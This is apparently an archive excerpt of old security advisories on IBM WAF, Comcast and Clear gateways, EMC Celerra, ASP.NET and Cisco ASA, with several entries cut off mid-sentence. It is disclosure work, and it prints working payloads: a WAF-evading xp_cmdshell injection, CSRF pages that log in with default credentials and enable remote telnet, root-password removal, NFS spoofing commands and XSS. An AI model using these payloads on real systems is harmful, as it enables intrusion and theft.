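DEEP_LEAF = Cert("deep.example", "SubCA", is_ca=False)
SHALLOW_LEAF = Cert("shallow.example", "LimitedCA", is_ca=False)


def verify_chain(chain, trust_anchors, hostname, check_basic_constraints=True):
    """Walk from chain[0] (the server certificate) up to a trust anchor.

    Returns (ok, reason). check_basic_constraints=False reproduces the flawed
    behaviour the advisories describe: any certificate is accepted as an
    issuer, so an end-entity certificate can vouch for a new hostname.
    """
    if not chain:
        return False, "empty chain"
    if chain[0].subject != hostname:
        return False, "hostname mismatch: %s" % chain[0].subject
    anchors = {c.subject: c for c in trust_anchors}
    for depth, cert in enumerate(chain):
        if depth + 1 < len(chain):
            issuer = chain[depth + 1]
        else:
            issuer = anchors.get(cert.issuer)
        if issuer is None or issuer.subject != cert.issuer:
            return False, "no issuer found for %s" % cert.subject
        if check_basic_constraints:
            # The missing check: only a certificate with cA=TRUE may issue.
            if not issuer.is_ca:
                return False, "%s is not a CA but issued %s" % (issuer.subject, cert.subject)
            # depth equals the number of intermediates between issuer and leaf.
            if issuer.path_len is not None and depth > issuer.path_len:
                return False, "pathLenConstraint of %s exceeded" % issuer.subject
    return True, "ok"
```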


Remediation Steps:
Users should update to the latest version of iOS in order to address this
issue. This vulnerability has been corrected in versions 5.0b4, 4.3.5, and
4.2.10.

Revision History:
07/15/11 - Vulnerability Disclosed
07/25/11 - Patch Released
07/25/11 - Advisory Published

References:
1. http://support.apple.com/kb/HT4824
2. http://support.apple.com/kb/HT4825





TWSL2011-006: IBM Web Application Firewall Bypass

2011-06-24 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-006:
IBM Web Application Firewall Bypass

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt

Published: 2011-06-21
Version: 1.0

Vendor: IBM
Product: IBM Web Application Firewall
These capabilities are included through SiteProtector 7.0 and later
software within IBM Security Network IPS GX products, IBM Security Server
Protection products, and IBM Security Multi-Function product lines during
2H of 2009.

Versions affected:
Tested against G400 IPS-G400-IB-1 (Intrusion Prevention
Update: 2011-03-11 00:34:23 - version: 31.030) and GX4004 IPS-GX4004-IB-2
(Intrusion Prevention Update: 2011-03-10 23:49:15 - version: 31.030).

Product description:
IBM Web Application Firewall capabilities inside IBM IPS products
complement IBM Security's portfolio of web application security offerings
to deliver end-to-end Web application security solutions.

Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs

Finding: IBM Web Application Firewall Bypass

The IBM Web Application Firewall can be evaded, allowing an attacker to
exploit web vulnerabilities that the product is intended to protect against.
The issue occurs when an attacker submits repeated occurrences of the same
parameter.

The example shown below uses the following environment:
A web environment using Microsoft IIS, ASP .NET technology, Microsoft
SQL Server 2000, being protected by the IBM Web Application Firewall.

As expected, the following request will be identified and blocked
(depending on configuration) by the IBM Web Application Firewall.

http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell ping 10.1.1.3 --

IIS with ASP.NET (and even classic ASP) will concatenate the contents of a
parameter if multiple entries for it are part of the request.

http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell &iid= ping 10.1.1.3 --

IIS with ASP.NET (and classic ASP) will concatenate both entries of the iid
parameter, inserting a comma between them, so the following string is sent
to the database.

'; EXEC master..xp_cmdshell , ping 10.1.1.3 --

The request above will still be identified and blocked (depending on
configuration) by the IBM Web Application Firewall, because it appears that
EXEC and xp_cmdshell appearing together trigger an attack pattern.

However, it is possible to split the payload at every space across multiple
occurrences of the parameter. For example:

http://sitename/find_ta_def.aspx?id=2571&iid='; &iid= EXEC &iid= master..xp_cmdshell &iid= ping 10.1.1.3 &iid= --

The above request bypasses the affected IBM Web Application Firewall,
because no single parameter value contains the full pattern, and results in
the following string being sent to the database.

'; , EXEC , master..xp_cmdshell , ping 10.1.1.3 , --

However, the above SQL will not execute because of the commas inserted into
the query. To solve this, SQL comments are used to swallow the commas.

http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ ping 10.1.1.3 /*&iid=1*/ --

The above request bypasses the IBM Web Application Firewall, and the
following string is sent to the database, which is valid, working SQL.

'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ ping 10.1.1.3 /*,1*/ --

The above code will execute the ping command on the Microsoft Windows
backend, assuming the application's database login has permission to
execute xp_cmdshell (on SQL Server 2000, members of the sysadmin role by
default).

This attack class is also referred to as HTTP Parameter Pollution (HPP) or
HTTP Parameter Concatenation.

The exploitability of this issue depends on the infrastructure in use (web
server, development framework, etc.), because each platform handles repeated
parameters differently: ASP.NET joins all occurrences with a comma, whereas,
for example, PHP keeps only the last occurrence and Java servlet containers
return the first one from getParameter().
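The following is an added example, not code from the advisory or from IBM: it models the two parsers that disagree here, a WAF that inspects each parameter value in isolation and an ASP.NET backend that comma-joins duplicate parameters, and runs the three request stages from the text through both. The signature is a constructed stand-in (the real IBM pattern is not published; the advisory only says EXEC and xp_cmdshell together trigger it), and the normalizing WAF at the end is the hardened form, matching against the backend's view rather than individual values.

```python
import re
from urllib.parse import unquote_plus

# Constructed model of a multi-token SQLi signature (assumption: the real IBM
# pattern is not published; the advisory says EXEC + xp_cmdshell trigger it).
ATTACK_SIGNATURE = re.compile(r"\bexec\b.*xp_cmdshell", re.IGNORECASE | re.DOTALL)


def parse_query(query: str):
    """Split a query string into (name, value) pairs, keeping duplicates in order.

    Splits only on '&' (never ';'), which is what IIS/ASP.NET does.
    """
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def aspnet_param(query: str, name: str) -> str:
    """What Request["name"] returns in ASP.NET: every occurrence joined with ','."""
    return ",".join(v for k, v in parse_query(query) if k == name)


def naive_waf_blocks(query: str) -> bool:
    """WAF that matches each parameter value in isolation (the evaded behaviour)."""
    return any(ATTACK_SIGNATURE.search(v) for _, v in parse_query(query))


def normalizing_waf_blocks(query: str) -> bool:
    """Hardened WAF: rebuild the backend's comma-joined view first, then match."""
    names = {k for k, _ in parse_query(query)}
    return any(ATTACK_SIGNATURE.search(aspnet_param(query, n)) for n in names)


# Constructed requests mirroring the advisory's three stages.
REQ_PLAIN = "id=2571&iid='; EXEC master..xp_cmdshell ping 10.1.1.3 --"
REQ_SPLIT = "id=2571&iid='; &iid= EXEC &iid= master..xp_cmdshell &iid= ping 10.1.1.3 &iid= --"
REQ_COMMENT = ("id=2571&iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell "
               "/*&iid=1*/ ping 10.1.1.3 /*&iid=1*/ --")

if __name__ == "__main__":
    for req in (REQ_PLAIN, REQ_SPLIT, REQ_COMMENT):
        print(f"backend sees : {aspnet_param(req, 'iid')!r}")
        print(f"naive WAF    : {'blocked' if naive_waf_blocks(req) else 'PASSED'}")
        print(f"normalizing  : {'blocked' if normalizing_waf_blocks(req) else 'PASSED'}")
        print()
```

The comma-joined strings produced by aspnet_param for the second and third requests are exactly the two database-side strings quoted above; the comment trick only matters to the database, since the normalizing WAF already sees EXEC and xp_cmdshell in one string once the join is applied.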


Remediation Steps:
IBM has released fixes to the above issue in the Super Tuesday patch
released in June. Refer to the references section of the advisory for
further information released by IBM.

Revision History:
04/07/11 - Vulnerability disclosed
06/16/11 - Patch released
06/21/11 - Advisory published

References:
1.
http://www.iss.net/security_center/reference/vuln/HTTP_Parameter_Abuse.htm
2. http://xforce.iss.net/xforce/xfdb/67178

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and

TWSL2011-002:Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR)

2011-02-07 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2011-002:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)

https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt

Published: 2011-02-04
Version: 1.0

Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected:  Versions prior to 1.4.0.49.2

Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.

Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs

Finding 1: Static Credentials
CVE: CVE-2011-0885

All SMCD3G-CCR gateways provided by Comcast have an administrative login of
"mso" with the password "D0nt4g3tme". These credentials are not disclosed
to the customer as part of the device installation, and customers are not
advised to change them, so the majority of users are unaware of the default
configuration.

With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries.  These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device.  The mso login provides shell as UID 0 (root).


Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface.  Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.

The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.

## smcd3g-csrf-poc.htm

<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1"></iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1"></iframe>
</body>
</html>

## smcd3g-csrf-poc-1.htm

<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post" name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form>
<script>document.tF.submit();</script>
</body>
</html>

## smcd3g-csrf-poc-2.htm

<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange" name="RMangement" method="post">
<input type="hidden" value="feat-admin-remote" name="file" />
<input type="hidden" value="admin/" name="dir" />
<input type="hidden" name="RemoteRange" value="0" />
<input type="hidden" name="rm_access" value="on" />
<input type="hidden" name="Remote0" value="0.0.0.0,0.0.0.0,1" />
<input type="hidden" name="http_port" value="8080" />
<input type="hidden" name="http_enable" value="on" />
<input type="hidden" name="http_flag" value="1" />
<input type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" />
<input type="hidden" name="telnet_enable" value="on" />
<input type="hidden" name="telnet_port" value="2323" />
<input type="hidden" name="telnet_flag" value="1" />
<input type="hidden" name="Remote1" value="" />
</form>
<script>
// Delay so the login frame has established a session before this form is posted.
setTimeout(function () { document.RMangement.submit(); }, 4000);
</script>
</body>
</html>

## smcd3g-csrf-poc-3.htm

<html>
<body>
<form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post">
<input type="hidden" value="feat-wan-ip" name="file" />
<input type="hidden" value="admin/" name="dir" />
<input type="hidden" value="Fixed" name="DNSAssign" />
<input type="hidden" value="0" name="dhcpc_release" />
<input type="hidden" value="0" name="dhcpc_renew" />
<input type="hidden" value="" name="domain_name" />
<input type="hidden" value="" name="WDn" />
<input type="hidden" name="SysName" value="" />
<input type="hidden" name="manual_dns_enable" value="on" />
<input type="hidden" name="DAddr" value="4.2.2.1" />
<input type="hidden" name="DAddr0" value="4" />
<input type="hidden" name="DAddr1" value="2" />
<input type="hidden" name="DAddr2" value="2" />
<input type="hidden" name="DAddr3" value="1" />
<input type="hidden" name="PDAddr" value="4.2.2.2" />
<input type="hidden" name="PDAddr0" value="4" />
<input type="hidden" name="PDAddr1" value="2" />
<input type="hidden" name="PDAddr2" value="2" />
<input type="hidden" name="PDAddr3" value="2" />
</form>
<script>
// Posted last, after the remote-administration change has been submitted.
setTimeout(function () { document.WanIPform.submit(); }, 5000);
</script>
</body>
</html>

If the PoC were embedded in any web page the targeted user visited while
logged into the device, the attacker would gain remote administration of the
gateway device, including a telnet shell. This would allow the attacker to
redirect traffic to a malicious endpoint.


Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a 

TWSL-2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities

2010-12-13 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2010-008:
Clear iSpot/Clearspot CSRF Vulnerabilities

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

Published: 2010-12-10 Version: 1.0

Vendor: Clear (http://www.clear.com)
Products: iSpot / ClearSpot 4G (http://www.clear.com/devices)
Versions affected:
The observed behavior is the result of a design choice, and may be present
on multiple versions. The specific versions used during testing are
given below.

iSpot version:   2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions:  2.0.0.0 [R1512 (May 31 2010 18:57:09)]
 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version :   1.9.9.4
Hardware Version :   R051.2
Device Name :IMW-C615W
Device Manufacturer :INFOMARK (http://infomark.co.kr)

Product Description:
iSpot and ClearSpot 4G are portable 4G devices that allow users to share
and broadcast their own personal WiFi network. The device connects up to 8
clients at the same time over the same 4G connection.

Credit: Matthew Jakubowski of Trustwave's SpiderLabs

CVE: CVE-2010-4507

Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF).
An attacker that is able to coerce a ClearSpot / iSpot user into
following a link can arbitrarily execute system commands on the device.

The following examples will allow an attacker to enable remote access to the
iSpot and ClearSpot 4G, and add their own account to the device. This level
of access also exposes the device's client-side SSL certificates, which are
used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.

Add new user:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="adduser -S jaku">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20jaku'>

Remove root password:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_cmd_result">
<input type="hidden" name="cmd" value="passwd -d root">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root'>

Enable remote administration access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="enable_remote_access" value="YES">
<input type="hidden" name="remote_access_port" value="80">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80'>

Enable telnet if not already enabled:

<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_set_wimax_etc_config">
<input type="hidden" name="ENABLE_TELNET" value="YES">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&ENABLE_TELNET=YES'>

Allow remote telnet access:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="add_enable" value="YES">
<input type="hidden" name="add_host_ip" value="1">
<input type="hidden" name="add_port" value="23">
<input type="hidden" name="add_protocol" value="BOTH">
<input type="hidden" name="add_memo" value="admintelnet">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_set&add_enable=YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet'>

Once compromised, it is possible to download any file from the device using
the following method.

Download /etc/passwd file:
<form method="post" action="http://192.168.1.1/cgi-bin/upgrademain.cgi">
<input type="hidden" name="act" value="act_file_download">
<input type="hidden" name="METHOD" value="PATH">
<input type="hidden" name="FILE_PATH" value="/etc/passwd">
<input type="submit">
</form>

or

<img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd'>

Vendor Response:
No official response is available at the time of release.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.

Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.

Revision History:
1.0 Initial publication


TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra NAS appliance

2010-08-03 Thread Trustwave Advisories

Trustwave's SpiderLabs Security Advisory TWSL2010-003:
Unauthorized access to root NFS export on EMC Celerra Network Attached
Storage (NAS) appliance

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-003.txt

Published: 2010-07-29 Version: 1.0

Vendor: EMC (http://www.emc.com)
Product: Celerra Unified Storage products
(http://www.emc.com/products/family/celerra-family.htm)
Version(s) affected: All

Product Description:
The Celerra Unified Storage Platform provides Network Attached Storage (NAS)
services through a combination of server appliances and software modules.

Credit: Steve Ocepek of Trustwave's SpiderLabs

CVE: CVE-2010-2860

Finding:
The Celerra appliance's NFS server freely exports its / file system and
enforces access using a factory-defined list of authorized IP addresses.
The addresses found on a recent model are listed in the showmount example
below, however this list may differ depending on product version. The IP
addresses are intended for communication internal to the appliance, but are
still accepted from external sources. An attacker can mount this file system
by spoofing an authorized IP address.

The NFS showmount command can be used to obtain a list of the IP addresses:

 # showmount -e <Celerra IP address>
 Export list for <Celerra IP address>:
 / 128.221.253.101,128.221.252.101,128.221.253.100,128.221.252.100

Because the appliance's NFS server does not enable the rootsquash feature,
full access to the file system is possible by mounting the export using root
(UID 0).

Fully spoofing the source IP address (for sending and receiving packets)
will usually require access to the local subnet or the ability to exploit
some other network infrastructure vulnerability. On Linux, local IP address
spoofing can be accomplished by creating an alias interface and using the
ip route command to set the source IP accordingly.

 # ifconfig eth0:0 128.221.253.101
 # ip route add <Celerra IP address> dev eth0 src 128.221.253.101
 # mkdir nfs
 # mount <Celerra IP address>:/ nfs


The flaw allows unauthorized access to files contained on the system,
including all CIFS shares and iSCSI mounted drives. The / path does not
correspond to the true root of the file system -- only the root of the user
data directory is exposed.

Vendor Response:
The vendor has acknowledged this issue and issued the following workaround.

Vendor has also published a knowledgebase article about the issue and
mitigation so support can help any customers who call in with this issue
until a permanent fix from EMC is available.

Vendor estimated date for a code fix is Q3 2010.

Remediation Steps: 

The following recommendations were provided by the vendor.

1. Hide NFS exports and show them only based on the configured access. Setting
the forceFullShowmount parameter to 0 (default is 1) will hide the / export
from the list, since only the Control Station has access to it for
administration purposes:

[root@virgil slot_3]# server_param server_3 -f mount -info forceFullShowmount

server_3 : 
name= forceFullShowmount
facility_name   = mount
default_value   = 1
current_value   = 1
configured_value=
user_action = none
change_effective= immediate
range   = (0,1)
description = Forces response to showmount requests to fully
  populate response.

[root@virgil slot_3]# server_param server_3 -f mount -modify \
forceFullShowmount -value 0

server_3 : done

After the above change, clients will see only the exports they have
permission to access:

/usr/sbin/showmount -e 172.24.97.3
Export list for 172.24.97.3:
/fs1 (everyone)

2. Change default IP addresses (during install or after) for internal
network along with first step above to further minimize the exploitability.

Product team has provided additional mitigations steps that can be
implemented by the customers to reduce the severity of exploitation of a
vulnerability: 

1. Create IP-based access rules on the network equipment rejecting traffic
for IP addresses belonging to the internal Celerra network, which has its own
switch for that purpose. These addresses are listed in the /etc/hosts file
of the Celerra Control Station.

2. Configure firewall(s) between Data Movers and NFS clients to reject
traffic for IP addresses belonging to the internal Celerra network.

3. Hide NFS exports and show them only based on the configured access. Setting
the forceFullShowmount parameter to 0 (default is 1) will hide the "/" export
from the list, since only the Control Station has access to it for
administration purposes.

4. Disable IP reflect

Vendor Communication Timeline:
05/07/10 - Initial communication
05/10/10 - Vulnerability details provided
05/18/10 - Vulnerability acknowledged, workaround and timeline provided
07/27/10 - Additional workaround details provided

Revision History: 
1.0 Initial publication


Trustwave's SpiderLabs Security Advisory TWSL2010-001

2010-02-10 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2010-001:
Multiplatform View State Tampering Vulnerabilities

Published: 2010-02-08 Version: 1.1

SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.

The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
but specific exploits have not been previously documented.
These vulnerabilities show that unsigned client-side view
states will ALWAYS result in a vulnerability in the affected
products.

Credit: David Byrne of Trustwave's SpiderLabs


===
Vendor: Microsoft (http://www.microsoft.com)
Product: ASP.Net (http://www.asp.net)
Versions affected: .Net 3.5 is confirmed vulnerable;
previous versions are likely to be vulnerable as well.

Description:
ASP.Net is a web-application development framework that
provides for both user interfaces, and back-end
functionality.

The ASP.Net view state is typically stored in a hidden field
named __VIEWSTATE. When a page's view state is not
cryptographically signed, many standard .Net controls are
vulnerable to Cross-Site Scripting (XSS) through the view
state.

It is well documented that using an unsigned view state is
bad, but most previous advisories focus on vaguely
described threats or vulnerabilities introduced by custom
use of the view state. To the best of Trustwave's knowledge,
this is the first time a proof of concept attack of this
nature has been demonstrated against the view state. A
vulnerability was alluded to in a 2004 Microsoft article on
troubleshooting view state problems [1]. However, other
Microsoft documents recommend disabling view state signing
if performance is a key consideration, [2, 3, 4] or for
various other reasons [5, 6]. Realistically, unsigned view
states should never be used in a production environment.

The following code is vulnerable to a XSS attack against the
form control. Note that the ValidateRequest setting does
not prevent the attack.

   <%@ Page EnableViewStateMac="False" ValidateRequest="True" %>
   <html runat="server">
     <form runat="server"/>
   </html>



If the following request is sent to the server, the response
will contain JavaScript that calls an alert box.

xss.aspx?__VIEWSTATE=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxY
CHglpbm5lcmh0bWwFHTxzY3JpcHQ%2BYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2
BZGQ=

The view state's XML equivalent is below:

   <?xml version="1.0" encoding="utf-16"?>
   <viewstate>
     <Pair>
       <Pair>
         <String>-834067820</String>
         <Pair>
           <ArrayList>
             <Int32>0</Int32>
             <Pair>
               <ArrayList>
                 <Int32>1</Int32>
                 <Pair>
                   <ArrayList>
                     <IndexedString>innerhtml</IndexedString>
                     <String>&lt;script&gt;alert('xss')&lt;/script&gt;</String>
                   </ArrayList>
                 </Pair>
               </ArrayList>
             </Pair>
           </ArrayList>
         </Pair>
       </Pair>
     </Pair>
   </viewstate>

The HTML response is below:
   <html>
     <form name="ctl01" method="post" action="xss.aspx" id="ctl01">
       <div>
         <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
   value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" />
       </div>
       <script>alert('xss')</script></form>
   </html>

This example uses the innerhtml attribute of the form
control, although other attributes in other controls are
also vulnerable to similar attacks.


Remediation Steps:
The ASP.Net view state should always be cryptographically
signed with a Message Authentication Code (MAC). This has
been enabled by default since .Net 1.1, but can be disabled
using the EnableViewStateMac setting. Using the
ViewStateUserKey setting can also help to mitigate the
scope of this vulnerability. [7]




===
Vendor: Apache Software Foundation (http://www.apache.org)
Product: Apache MyFaces (http://myfaces.apache.org/)
Versions affected: 1.2.8 and 1.1.7 are confirmed as
   vulnerable. All previous versions are likely vulnerable.
Related products: Some versions of IBM WebSphere Application
   Server (at least 6.x and 7.x) ship with Apache MyFaces 
   [8,9]

Description:
MyFaces is an open source implementation of the JavaServer
Faces standard. JavaServer Faces [10] is a framework that
aids in developing user interfaces for web-based
applications.

When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored 

Trustwave's SpiderLabs Security Advisory TWSL2009-002

2009-06-24 Thread Trustwave Advisories
Trustwave's SpiderLabs Security Advisory TWSL2009-002: 
Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24 Version: 1.0

Vendor: Cisco Systems, Inc. (http://www.cisco.com)

Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description: Cisco's Adaptive Security Appliance (ASA)
provides a number of security related features, including
Web VPN functionality that allows authenticated users to
access a variety of content through a web interface. This
includes other web content, FTP servers, and CIFS file
servers.

The web content is proxied by the ASA and rewritten so that
any URLs in the web content are passed as query parameters
sent to the ASA web interface. Where scripting content is
present, the ASA places a JavaScript wrapper around the
original webpage's Document Object Model (DOM), to prevent
the webpage from accessing the ASA's DOM.

Credit: David Byrne of Trustwave's SpiderLabs


Finding 1: Post-Authentication Cross-Site Scripting
CVE: CVE-2009-1201
The ASA's DOM wrapper can be rewritten in a manner to allow
Cross-Site Scripting (XSS) attacks. For example, the
csco_wrap_js JavaScript function in /+CSCOL+/cte.js makes
a call to a function referenced by CSCO_WebVPN['process'].
The result of this call is then used in an eval statement.

function csco_wrap_js(str)
{
   var ret="<script id=CSCO_GHOST src="+CSCO_Gateway+
   "/+CSCOL+/cte.js></scr"+
   "ipt><script id=CSCO_GHOST src="+
   CSCO_Gateway+"/+CSCOE+/apcf></sc"+"ript>";
   var js_mangled=CSCO_WebVPN['process']('js',str);
   ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
   return ret;
};

To exploit this behavior, a malicious page can rewrite
CSCO_WebVPN['process'] with an attacker-defined function
that will return an arbitrary value. The next time the
csco_wrap_js function is called, the malicious code will
be executed. Below is a proof of concept.

<html><script>
function a(b, c)
{
   return "alert('Your VPN location:\\n\\n'+" +
   "document.location+'\\n\\n\\n\\n\\n" +
   "Your VPN cookie:\\n\\n'+document.cookie);";
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
</script></html>

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security This vulnerability is
documented in Cisco Bug ID:  CSCsy80694.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202
When a webpage is requested through the ASA's Web VPN, the target scheme and
hostname are ROT13-encoded, then hex-encoded and placed in the ASA's URL
after a two-digit flag (00 in normal operation). For example,
"https://www.trustwave.com" is accessed by requesting the following ASA
path:

/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/

The HTML content of this request is obviously reformatted by
the ASA, starting at the very beginning:

  <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the initial hex value
from 00 to 01, the HTML document is returned without any rewriting. This
allows the page's scriptable content to run in the ASA's DOM, and therefore
in the ASA's origin, making Cross-Site Scripting trivial.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT

A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80705.

CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9


Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203
When a user accesses an FTP or CIFS destination using the Web VPN, the
resulting URL is formatted in a similar manner to the web requests described
above. The following URL attempts to connect to "ftp.example.com"; normally,
it would be loaded in an HTML frame within the Web VPN website.

/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS
share using anonymous credentials. If those fail, the user
is prompted for login credentials. When viewed on its own
(outside of a frame), the submission form gives no
indication what it is for and is very similar in appearance
to the Web VPN's primary login page. If the URL was sent to
a user by an attacker, it is very possible that a user would
assume that he needs to resubmit credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's
FTP or CIFS server.
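The following is an added example, not Cisco code and not part of the advisory: a small codec for the two path encodings used in Findings 2 and 3, ROT13 followed by hex for the proxied-page path (/+CSCO+<flag><hex>++/) and for the path= value of the file browser. Decoding the advisory's own paths shows what each points at, and the flag byte is exposed so a tester can spot the 01 variant that the advisory reports returns unrewritten content. The helper names are this example's own.

```python
import codecs
import re
from urllib.parse import unquote

# Proxied-page path: /+CSCO+<2 hex digits flag><hex(rot13(scheme://host))>++/
PATH_RE = re.compile(r"/\+CSCO\+([0-9A-Fa-f]{2})([0-9A-Fa-f]*)\+\+/")


def rot13(s: str) -> str:
    return codecs.encode(s, "rot_13")


def encode_webvpn_target(url: str, flag: int = 0x00) -> str:
    """Build the path the Web VPN uses for a proxied URL; 0x00 is the normal flag."""
    return f"/+CSCO+{flag:02X}{rot13(url).encode('ascii').hex().upper()}++/"


def decode_webvpn_target(path: str):
    """Return (flag, original_url) for a proxied-page path, or None if it is not one."""
    m = PATH_RE.fullmatch(path)
    if m is None:
        return None
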